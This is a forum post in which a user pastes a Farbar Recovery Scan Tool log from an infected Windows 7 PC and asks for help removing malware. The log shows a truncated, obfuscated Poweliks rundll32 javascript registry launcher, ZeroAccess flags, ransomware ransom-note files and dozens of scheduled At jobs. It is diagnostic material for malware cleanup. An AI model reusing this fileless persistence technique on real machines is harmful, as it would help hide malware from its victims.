aagah

Members

View Profile See their activity

Posts
1
Joined
September 27, 2014
Last visited
September 27, 2014

Reputation

0 Neutral

dllhost32 keeps running with javascript RunHtmlApplication

aagah posted a topic in Resolved Malware Removal Logs

Here is my FRST.log Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 27-09-2014Ran by smotamedy (administrator) on SMOTAMDEY on 27-09-2014 17:56:48Running from F:\Loaded Profile: smotamedy (Available profiles: admin & smotamedy)Platform: Microsoft Windows 7 Professional (X86) OS Language: English (United States)Internet Explorer Version 8Boot Mode: NormalTutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe(Cisco WebEx LLC) C:\Windows\System32\atashost.exe(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\DIBS\DDNIService.exe(Lenovo) C:\Program Files\ThinkPad\Utilities\PWMDBSVC.exe() C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Sks8821.exe(Ulead Systems, Inc.) C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe(LITEON) C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\skdh8821.exe(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe(Intuit Inc.) C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe(Intuit Inc.) C:\Program Files\Intuit\QuickBooks 2012\QBW32.EXE(Digital Delivery Networks, Inc.) C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe(Microsoft Corp.) C:\Program Files\Microsoft\Search Enhancement Pack\SeaPort\SeaPort.exe(Lenovo Group Limited) C:\Program Files\Lenovo\System Update\SUService.exe(Lenovo Group Limited) C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe(Microsoft Corporation) C:\Windows\System32\taskmgr.exe(Microsoft Corporation) C:\Windows\System32\mobsync.exe(Microsoft Corporation) C:\Windows\System32\rundll32.exe(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) Winlogon\Notify\vvubjer: C:\Users\SMOTAM~1\AppData\Local\Temp\yhO0a9p3PC3iH3FRVaL\AppData\Local\vvubjer.dll [X]HKLM\...D6A79037F57F\InprocServer32: [Default-fastprox] fastprox.dll ATTENTION! ====> ZeroAccess?HKLM\...\Policies\Explorer: [NoWelcomeScreen] 1HKU\S-1-5-21-499009960-272174587-744029597-1146\...\Run: [msnmsgr] => C:\Program Files\Windows Live\Messenger\msnmsgr.exe [3883856 2009-07-26] (Microsoft Corporation)HKU\S-1-5-21-499009960-272174587-744029597-1146\...\Policies\Explorer: [Run] "C:\Users\smotamedy\AppData\Roaming\Microsoft\Windows\IEUpdate\esentutl.exe"HKU\S-1-5-21-499009960-272174587-744029597-1146\...\MountPoints2: {cb82d864-b72f-11df-aa94-806e6f6e6963} - Q:\LenovoQDrive.exeHKU\S-1-5-21-499009960-272174587-744029597-1146\...409d6c4515e9\InprocServer32: [Default-shell32] C:\$Recycle.Bin\S-1-5-21-499009960-272174587-744029597-1146\$0a1e85f3e1cd51d1261ae5ea5aa3df51\n. ATTENTION! ====> ZeroAccess?HKU\S-1-5-21-499009960-272174587-744029597-1146\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!HKU\S-1-5-18\...\RunOnce: [FlashPlayerUpdate] => C:\Windows\system32\Macromed\Flash\FlashUtil10n_ActiveX.exe -update activexStartup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Intuit Data Protect.lnkShortcutTarget: Intuit Data Protect.lnk -> C:\Program Files\Common Files\Intuit\DataProtect\IntuitDataProtect.exe (Intuit Inc.)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks Update Agent.lnkShortcutTarget: QuickBooks Update Agent.lnk -> C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe (Intuit Inc.)Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\QuickBooks_Standard_21.lnkShortcutTarget: QuickBooks_Standard_21.lnk -> C:\Program Files\Intuit\QuickBooks 2012\QBW32.EXE (Intuit Inc.)Startup: C:\Users\smotamedy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\esentutl.lnkShortcutTarget: esentutl.lnk -> C:\Users\smotamedy\AppData\Roaming\Microsoft\Windows\IEUpdate\esentutl.exe (No File) ==================== Internet (Whitelisted) ==================== (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.) HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.msn.com/HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://lenovo.msn.comHKCU\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://www.lenovo.com/welcome/thinkcentreSearchScopes: HKCU - DefaultScope {CAB6444A-D968-40CC-8D3D-32F912B73043} URL = SearchScopes: HKCU - {CAB6444A-D968-40CC-8D3D-32F912B73043} URL = BHO: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} -> No FileBHO: Search Helper -> {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} -> C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll (Microsoft Corp.)BHO: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)BHO: Java Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre6\bin\jp2ssv.dll (Sun Microsystems, Inc.)BHO: Windows Live Toolbar Helper -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> C:\Program Files\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)Toolbar: HKLM - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)Toolbar: HKCU - &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll (Microsoft Corporation)DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_24-windows-i586.cabDPF: {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_24-windows-i586.cabDPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_24-windows-i586.cabHandler: intu-help-qb5 - {867FCB77-9823-4cd6-8210-D85F968D466F} - C:\Program Files\Intuit\QuickBooks 2012\HelpAsyncPluggableProtocol.dll (Intuit, Inc.)Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)Handler: qbwc - {FC598A64-626C-4447-85B8-53150405FD57} - C:\Windows\system32\mscoree.dll (Microsoft Corporation)Tcpip\Parameters: [DhcpNameServer] 192.168.1.254 FireFox:========FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF32.dll ()FF Plugin: @java.com/JavaPlugin -> C:\Program Files\Java\jre6\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)FF Plugin: @microsoft.com/GENUINE -> disabled No FileFF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.20513.0\npctrl.dll ( Microsoft Corporation)FF Plugin: @microsoft.com/WLPG,version=14.0.8081.0709 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation) Chrome: ======= ========================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 atashost; C:\Windows\system32\atashost.exe [43912 2010-11-23] (Cisco WebEx LLC)R2 DDNIMSGService; C:\Program Files\DDNI\Lenovo Idea Notes\DDNIMSGService.exe [171872 2010-07-20] (Digital Delivery Networks, Inc.) [File not signed]R2 DDNIService; C:\Program Files\DDNI\DIBS\DDNIService.exe [163680 2010-07-23] (Digital Delivery Networks, Inc.) [File not signed]S4 QBCFMonitorService; C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe [45056 2013-11-08] (Intuit) [File not signed]S3 QBFCService; C:\Program Files\Common Files\Intuit\QuickBooks\FCS\Intuit.QuickBooks.FCS.exe [61440 2011-08-19] (Intuit Inc.) [File not signed]S4 QBVSS; C:\Program Files\Common Files\Intuit\DataProtect\QBIDPService.exe [1248256 2011-08-19] (Intuit Inc.) [File not signed]R2 Sks8821; C:\Program Files\Lenovo\Lenovo Slim USB Keyboard\Sks8821.exe [125952 2010-05-04] () [File not signed]R2 SpyHunter 4 Service; C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe [770432 2014-01-09] (Enigma Software Group USA, LLC.)R2 SUService; c:\Program Files\Lenovo\System Update\SUService.exe [28672 2010-03-15] (Lenovo Group Limited) [File not signed]R2 ThinkVantage Registry Monitor Service; C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe [1019904 2009-08-28] (Lenovo Group Limited) [File not signed]S3 TVT Backup Service; C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe [1474560 2009-09-03] (Lenovo Group Limited) [File not signed]R2 UleadBurningHelper; C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe [61440 2008-01-10] (Ulead Systems, Inc.) [File not signed]S3 COMSysApp; %SystemRoot%\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} [X] ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) S3 AcpiPmi; C:\Windows\system32\DRIVERS\acpipmi.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]S3 aliide; C:\Windows\system32\DRIVERS\aliide.sys [40448 2009-07-13] (Acer Laboratories Inc.) [File not signed]S3 amdide; C:\Windows\system32\DRIVERS\amdide.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]S3 BrFiltLo; C:\Windows\system32\DRIVERS\BrFiltLo.sys [40448 2009-07-13] (Brother Industries, Ltd.) [File not signed]S3 BrFiltUp; C:\Windows\system32\DRIVERS\BrFiltUp.sys [40448 2009-07-13] (Brother Industries, Ltd.) [File not signed]S3 BrUsbMdm; C:\Windows\System32\Drivers\BrUsbMdm.sys [40448 2009-07-13] (Brother Industries Ltd.) [File not signed]S3 BrUsbSer; C:\Windows\System32\Drivers\BrUsbSer.sys [40448 2009-07-13] (Brother Industries Ltd.) [File not signed]S3 BthEnum; C:\Windows\System32\DRIVERS\BthEnum.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]S3 circlass; C:\Windows\system32\DRIVERS\circlass.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]S3 CmBatt; C:\Windows\system32\DRIVERS\CmBatt.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]S3 cmdide; C:\Windows\system32\DRIVERS\cmdide.sys [40448 2009-07-13] (CMD Technology, Inc.) [File not signed]S4 crcdisk; C:\Windows\system32\DRIVERS\crcdisk.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]S3 ErrDev; C:\Windows\system32\DRIVERS\errdev.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]S3 EsgScanner; C:\Windows\System32\DRIVERS\EsgScanner.sys [19984 2012-06-22] ()S3 fdc; C:\Windows\system32\DRIVERS\fdc.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]S3 flpydisk; C:\Windows\system32\DRIVERS\flpydisk.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]S3 hcw85cir; C:\Windows\system32\drivers\hcw85cir.sys [40448 2009-07-13] (Hauppauge Computer Works, Inc.) [File not signed]S3 HidBatt; C:\Windows\system32\DRIVERS\HidBatt.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]S3 HidIr; C:\Windows\system32\DRIVERS\hidir.sys [40448 2009-07-13] (Microsoft Corporation) [File not signed]S3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [110296 2014-09-27] (Malwarebytes Corporation)S3 megasas; C:\Windows\system32\DRIVERS\megasas.sys [40448 2009-07-13] (LSI Corporation) [File not signed]R0 vdorctrl; C:\Windows\System32\DRIVERS\vdorctrl.sys [44544 2009-07-13] () [File not signed] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-27 17:56 - 2014-09-27 17:56 - 00000000 ____D () C:\FRST2014-09-27 16:48 - 2014-09-27 16:48 - 00002246 _____ () C:\Users\smotamedy\Desktop\SpyHunter.lnk2014-09-27 16:48 - 2014-09-27 16:48 - 00000106 _____ () C:\spyhunter.fix2014-09-27 16:48 - 2014-09-27 16:48 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter2014-09-27 16:48 - 2014-09-27 16:48 - 00000000 ____D () C:\sh4ldr2014-09-27 16:48 - 2014-09-27 16:48 - 00000000 ____D () C:\Program Files\Enigma Software Group2014-09-27 16:48 - 2013-10-18 15:01 - 00285747 _____ () C:\shldr2014-09-27 16:48 - 2013-10-18 15:01 - 00008192 _____ () C:\shldr.mbr2014-09-27 16:47 - 2014-09-27 16:48 - 00000000 ____D () C:\Windows\455F074C814E4520B69B5584BD90400C.TMP2014-09-27 16:47 - 2014-09-27 16:47 - 00000000 ____D () C:\Program Files\Common Files\Wise Installation Wizard2014-09-27 14:39 - 2014-09-27 14:53 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys2014-09-27 14:38 - 2014-09-27 14:49 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware2014-09-27 14:38 - 2014-09-27 14:38 - 00001056 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk2014-09-27 14:38 - 2014-09-27 14:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware2014-09-27 14:38 - 2014-09-27 14:38 - 00000000 ____D () C:\ProgramData\Malwarebytes2014-09-27 14:38 - 2014-05-12 07:26 - 00051928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys2014-09-27 14:38 - 2014-05-12 07:25 - 00074456 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys2014-09-27 14:38 - 2014-05-12 07:25 - 00023256 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys2014-09-25 11:57 - 2014-09-25 11:31 - 00244136 _____ () C:\Users\smotamedy\Downloads\Firefox Setup Stub 32.0.3.exe2014-09-08 11:41 - 2014-09-27 14:58 - 00017470 _____ () C:\Windows\PFRO.log2014-09-08 10:16 - 2014-09-08 10:16 - 00000000 ____D () C:\Windows\system32\%SystemDrive%2014-09-07 03:09 - 2014-09-26 13:09 - 00073512 _____ () C:\feeddl.dat2014-09-07 02:57 - 2014-09-08 12:41 - 00054156 ____H () C:\Windows\QTFont.qfn2014-09-07 02:57 - 2014-09-07 02:57 - 00001409 _____ () C:\Windows\QTFont.for2014-09-07 01:28 - 2014-09-07 01:28 - 00008174 _____ () C:\Users\smotamedy\Documents\DECRYPT_INSTRUCTION.HTML2014-09-07 01:28 - 2014-09-07 01:28 - 00008174 _____ () C:\Users\smotamedy\DECRYPT_INSTRUCTION.HTML2014-09-07 01:28 - 2014-09-07 01:28 - 00008174 _____ () C:\Users\DECRYPT_INSTRUCTION.HTML2014-09-07 01:28 - 2014-09-07 01:28 - 00008174 _____ () C:\DECRYPT_INSTRUCTION.HTML2014-09-07 01:28 - 2014-09-07 01:28 - 00004132 _____ () C:\Users\smotamedy\Documents\DECRYPT_INSTRUCTION.TXT2014-09-07 01:28 - 2014-09-07 01:28 - 00004132 _____ () C:\Users\smotamedy\DECRYPT_INSTRUCTION.TXT2014-09-07 01:28 - 2014-09-07 01:28 - 00004132 _____ () C:\Users\DECRYPT_INSTRUCTION.TXT2014-09-07 01:28 - 2014-09-07 01:28 - 00004132 _____ () C:\DECRYPT_INSTRUCTION.TXT2014-09-07 01:28 - 2014-09-07 01:28 - 00000254 _____ () C:\Users\smotamedy\Documents\DECRYPT_INSTRUCTION.URL2014-09-07 01:28 - 2014-09-07 01:28 - 00000254 _____ () C:\Users\smotamedy\DECRYPT_INSTRUCTION.URL2014-09-07 01:28 - 2014-09-07 01:28 - 00000254 _____ () C:\Users\DECRYPT_INSTRUCTION.URL2014-09-07 01:28 - 2014-09-07 01:28 - 00000254 _____ () C:\DECRYPT_INSTRUCTION.URL2014-09-07 01:26 - 2014-09-07 01:26 - 00008174 _____ () C:\Users\smotamedy\AppData\Roaming\DECRYPT_INSTRUCTION.HTML2014-09-07 01:26 - 2014-09-07 01:26 - 00008174 _____ () C:\Users\smotamedy\AppData\DECRYPT_INSTRUCTION.HTML2014-09-07 01:26 - 2014-09-07 01:26 - 00004132 _____ () C:\Users\smotamedy\AppData\Roaming\DECRYPT_INSTRUCTION.TXT2014-09-07 01:26 - 2014-09-07 01:26 - 00004132 _____ () C:\Users\smotamedy\AppData\DECRYPT_INSTRUCTION.TXT2014-09-07 01:26 - 2014-09-07 01:26 - 00000254 _____ () C:\Users\smotamedy\AppData\Roaming\DECRYPT_INSTRUCTION.URL2014-09-07 01:26 - 2014-09-07 01:26 - 00000254 _____ () C:\Users\smotamedy\AppData\DECRYPT_INSTRUCTION.URL2014-09-07 01:23 - 2014-09-07 01:23 - 00008174 _____ () C:\Users\smotamedy\AppData\Local\DECRYPT_INSTRUCTION.HTML2014-09-07 01:23 - 2014-09-07 01:23 - 00004132 _____ () C:\Users\smotamedy\AppData\Local\DECRYPT_INSTRUCTION.TXT2014-09-07 01:23 - 2014-09-07 01:23 - 00000254 _____ () C:\Users\smotamedy\AppData\Local\DECRYPT_INSTRUCTION.URL2014-09-07 01:21 - 2014-09-07 01:21 - 00008174 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.HTML2014-09-07 01:21 - 2014-09-07 01:21 - 00008174 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.HTML2014-09-07 01:21 - 2014-09-07 01:21 - 00004132 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.TXT2014-09-07 01:21 - 2014-09-07 01:21 - 00004132 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.TXT2014-09-07 01:21 - 2014-09-07 01:21 - 00000254 _____ () C:\Users\Public\Documents\DECRYPT_INSTRUCTION.URL2014-09-07 01:21 - 2014-09-07 01:21 - 00000254 _____ () C:\Users\Public\DECRYPT_INSTRUCTION.URL2014-09-07 01:05 - 2014-09-27 17:05 - 00000354 _____ () C:\Windows\Tasks\At84.job2014-09-07 01:05 - 2014-09-27 17:05 - 00000352 _____ () C:\Windows\Tasks\At83.job2014-09-07 01:05 - 2014-09-27 16:05 - 00000354 _____ () C:\Windows\Tasks\At82.job2014-09-07 01:05 - 2014-09-27 16:05 - 00000352 _____ () C:\Windows\Tasks\At81.job2014-09-07 01:05 - 2014-09-27 15:05 - 00000354 _____ () C:\Windows\Tasks\At80.job2014-09-07 01:05 - 2014-09-27 15:05 - 00000352 _____ () C:\Windows\Tasks\At79.job2014-09-07 01:05 - 2014-09-27 14:05 - 00000354 _____ () C:\Windows\Tasks\At78.job2014-09-07 01:05 - 2014-09-27 14:05 - 00000352 _____ () C:\Windows\Tasks\At77.job2014-09-07 01:05 - 2014-09-27 13:05 - 00000354 _____ () C:\Windows\Tasks\At76.job2014-09-07 01:05 - 2014-09-27 13:05 - 00000352 _____ () C:\Windows\Tasks\At75.job2014-09-07 01:05 - 2014-09-25 23:05 - 00000354 _____ () C:\Windows\Tasks\At96.job2014-09-07 01:05 - 2014-09-25 23:05 - 00000352 _____ () C:\Windows\Tasks\At95.job2014-09-07 01:05 - 2014-09-25 22:09 - 00000352 _____ () C:\Windows\Tasks\At93.job2014-09-07 01:05 - 2014-09-25 22:05 - 00000354 _____ () C:\Windows\Tasks\At94.job2014-09-07 01:05 - 2014-09-25 21:05 - 00000354 _____ () C:\Windows\Tasks\At92.job2014-09-07 01:05 - 2014-09-25 21:05 - 00000352 _____ () C:\Windows\Tasks\At91.job2014-09-07 01:05 - 2014-09-25 20:06 - 00000352 _____ () C:\Windows\Tasks\At89.job2014-09-07 01:05 - 2014-09-25 20:05 - 00000354 _____ () C:\Windows\Tasks\At90.job2014-09-07 01:05 - 2014-09-24 19:06 - 00000352 _____ () C:\Windows\Tasks\At87.job2014-09-07 01:05 - 2014-09-24 19:05 - 00000354 _____ () C:\Windows\Tasks\At88.job2014-09-07 01:05 - 2014-09-24 18:05 - 00000354 _____ () C:\Windows\Tasks\At86.job2014-09-07 01:05 - 2014-09-24 18:05 - 00000352 _____ () C:\Windows\Tasks\At85.job2014-09-07 01:04 - 2014-09-26 12:08 - 00000352 _____ () C:\Windows\Tasks\At73.job2014-09-07 01:04 - 2014-09-26 12:05 - 00000354 _____ () C:\Windows\Tasks\At74.job2014-09-07 01:04 - 2014-09-26 11:05 - 00000354 _____ () C:\Windows\Tasks\At72.job2014-09-07 01:04 - 2014-09-26 11:05 - 00000352 _____ () C:\Windows\Tasks\At71.job2014-09-07 01:04 - 2014-09-26 10:07 - 00000352 _____ () C:\Windows\Tasks\At69.job2014-09-07 01:04 - 2014-09-26 10:05 - 00000354 _____ () C:\Windows\Tasks\At70.job2014-09-07 01:04 - 2014-09-26 09:05 - 00000354 _____ () C:\Windows\Tasks\At68.job2014-09-07 01:04 - 2014-09-26 09:05 - 00000352 _____ () C:\Windows\Tasks\At67.job2014-09-07 01:04 - 2014-09-26 08:06 - 00000352 _____ () C:\Windows\Tasks\At65.job2014-09-07 01:04 - 2014-09-26 08:05 - 00000354 _____ () C:\Windows\Tasks\At66.job2014-09-07 01:04 - 2014-09-26 07:07 - 00000352 _____ () C:\Windows\Tasks\At63.job2014-09-07 01:04 - 2014-09-26 07:05 - 00000354 _____ () C:\Windows\Tasks\At64.job2014-09-07 01:04 - 2014-09-26 06:05 - 00000354 _____ () C:\Windows\Tasks\At62.job2014-09-07 01:04 - 2014-09-26 06:05 - 00000352 _____ () C:\Windows\Tasks\At61.job2014-09-07 01:04 - 2014-09-26 05:05 - 00000354 _____ () C:\Windows\Tasks\At60.job2014-09-07 01:04 - 2014-09-26 05:05 - 00000352 _____ () C:\Windows\Tasks\At59.job2014-09-07 01:04 - 2014-09-26 04:05 - 00000354 _____ () C:\Windows\Tasks\At58.job2014-09-07 01:04 - 2014-09-26 04:05 - 00000352 _____ () C:\Windows\Tasks\At57.job2014-09-07 01:04 - 2014-09-26 03:05 - 00000354 _____ () C:\Windows\Tasks\At56.job2014-09-07 01:04 - 2014-09-26 03:05 - 00000352 _____ () C:\Windows\Tasks\At55.job2014-09-07 01:04 - 2014-09-26 02:05 - 00000354 _____ () C:\Windows\Tasks\At54.job2014-09-07 01:04 - 2014-09-26 02:05 - 00000352 _____ () C:\Windows\Tasks\At53.job2014-09-07 01:04 - 2014-09-26 01:05 - 00000354 _____ () C:\Windows\Tasks\At52.job2014-09-07 01:04 - 2014-09-26 01:05 - 00000352 _____ () C:\Windows\Tasks\At51.job2014-09-07 01:04 - 2014-09-26 00:05 - 00000354 _____ () C:\Windows\Tasks\At50.job2014-09-07 01:04 - 2014-09-26 00:05 - 00000352 _____ () C:\Windows\Tasks\At49.job2014-09-07 00:45 - 2014-09-08 20:53 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Awesdoop2014-09-07 00:44 - 2014-09-08 22:34 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Zovoheap2014-09-07 00:42 - 2014-09-27 14:49 - 00000000 ____D () C:\ProgramData\AfufGasor2014-09-07 00:24 - 2014-09-27 13:05 - 00000112 _____ () C:\ProgramData\bw5EWA37M.dat2014-09-07 00:23 - 2014-09-27 17:05 - 00000348 _____ () C:\Windows\Tasks\At36.job2014-09-07 00:23 - 2014-09-27 17:05 - 00000346 _____ () C:\Windows\Tasks\At35.job2014-09-07 00:23 - 2014-09-25 23:05 - 00000348 _____ () C:\Windows\Tasks\At48.job2014-09-07 00:23 - 2014-09-25 23:05 - 00000346 _____ () C:\Windows\Tasks\At47.job2014-09-07 00:23 - 2014-09-25 22:05 - 00000348 _____ () C:\Windows\Tasks\At46.job2014-09-07 00:23 - 2014-09-25 22:05 - 00000346 _____ () C:\Windows\Tasks\At45.job2014-09-07 00:23 - 2014-09-25 21:05 - 00000348 _____ () C:\Windows\Tasks\At44.job2014-09-07 00:23 - 2014-09-25 21:05 - 00000346 _____ () C:\Windows\Tasks\At43.job2014-09-07 00:23 - 2014-09-25 20:09 - 00000346 _____ () C:\Windows\Tasks\At41.job2014-09-07 00:23 - 2014-09-25 20:05 - 00000348 _____ () C:\Windows\Tasks\At42.job2014-09-07 00:23 - 2014-09-24 19:05 - 00000348 _____ () C:\Windows\Tasks\At40.job2014-09-07 00:23 - 2014-09-24 19:05 - 00000346 _____ () C:\Windows\Tasks\At39.job2014-09-07 00:23 - 2014-09-24 18:06 - 00000346 _____ () C:\Windows\Tasks\At37.job2014-09-07 00:23 - 2014-09-24 18:05 - 00000348 _____ () C:\Windows\Tasks\At38.job2014-09-07 00:22 - 2014-09-27 16:49 - 00000346 _____ () C:\Windows\Tasks\At33.job2014-09-07 00:22 - 2014-09-27 16:05 - 00000348 _____ () C:\Windows\Tasks\At34.job2014-09-07 00:22 - 2014-09-27 15:05 - 00000348 _____ () C:\Windows\Tasks\At32.job2014-09-07 00:22 - 2014-09-27 15:05 - 00000346 _____ () C:\Windows\Tasks\At31.job2014-09-07 00:22 - 2014-09-27 14:49 - 00000000 ____D () C:\Users\smotamedy\AppData\Roaming\Ymyqbyg2014-09-07 00:22 - 2014-09-27 14:05 - 00000348 _____ () C:\Windows\Tasks\At30.job2014-09-07 00:22 - 2014-09-27 14:05 - 00000346 _____ () C:\Windows\Tasks\At29.job2014-09-07 00:22 - 2014-09-27 13:05 - 00000348 _____ () C:\Windows\Tasks\At28.job2014-09-07 00:22 - 2014-09-27 13:05 - 00000346 _____ () C:\Windows\Tasks\At27.job2014-09-07 00:22 - 2014-09-26 12:06 - 00000346 _____ () C:\Windows\Tasks\At25.job2014-09-07 00:22 - 2014-09-26 12:05 - 00000348 _____ () C:\Windows\Tasks\At26.job2014-09-07 00:22 - 2014-09-26 11:07 - 00000346 _____ () C:\Windows\Tasks\At23.job2014-09-07 00:22 - 2014-09-26 11:05 - 00000348 _____ () C:\Windows\Tasks\At24.job2014-09-07 00:22 - 2014-09-26 10:05 - 00000348 _____ () C:\Windows\Tasks\At22.job2014-09-07 00:22 - 2014-09-26 10:05 - 00000346 _____ () C:\Windows\Tasks\At21.job2014-09-07 00:22 - 2014-09-26 09:05 - 00000348 _____ () C:\Windows\Tasks\At20.job2014-09-07 00:22 - 2014-09-26 09:05 - 00000346 _____ () C:\Windows\Tasks\At19.job2014-09-07 00:22 - 2014-09-26 08:08 - 00000346 _____ () C:\Windows\Tasks\At17.job2014-09-07 00:22 - 2014-09-26 08:05 - 00000348 _____ () C:\Windows\Tasks\At18.job2014-09-07 00:22 - 2014-09-26 07:05 - 00000348 _____ () C:\Windows\Tasks\At16.job2014-09-07 00:22 - 2014-09-26 07:05 - 00000346 _____ () C:\Windows\Tasks\At15.job2014-09-07 00:21 - 2014-09-26 06:05 - 00000348 _____ () C:\Windows\Tasks\At14.job2014-09-07 00:21 - 2014-09-26 06:05 - 00000346 _____ () C:\Windows\Tasks\At13.job2014-09-07 00:21 - 2014-09-26 05:05 - 00000348 _____ () C:\Windows\Tasks\At12.job2014-09-07 00:21 - 2014-09-26 05:05 - 00000346 _____ () C:\Windows\Tasks\At11.job2014-09-07 00:21 - 2014-09-26 04:05 - 00000348 _____ () C:\Windows\Tasks\At10.job2014-09-07 00:21 - 2014-09-26 04:05 - 00000346 _____ () C:\Windows\Tasks\At9.job2014-09-07 00:21 - 2014-09-26 03:06 - 00000346 _____ () C:\Windows\Tasks\At7.job2014-09-07 00:21 - 2014-09-26 03:05 - 00000348 _____ () C:\Windows\Tasks\At8.job2014-09-07 00:21 - 2014-09-26 02:05 - 00000348 _____ () C:\Windows\Tasks\At6.job2014-09-07 00:21 - 2014-09-26 02:05 - 00000346 _____ () C:\Windows\Tasks\At5.job2014-09-07 00:21 - 2014-09-26 01:05 - 00000348 _____ () C:\Windows\Tasks\At4.job2014-09-07 00:21 - 2014-09-26 01:05 - 00000346 _____ () C:\Windows\Tasks\At3.job2014-09-07 00:21 - 2014-09-26 00:05 - 00000348 _____ () C:\Windows\Tasks\At2.job2014-09-07 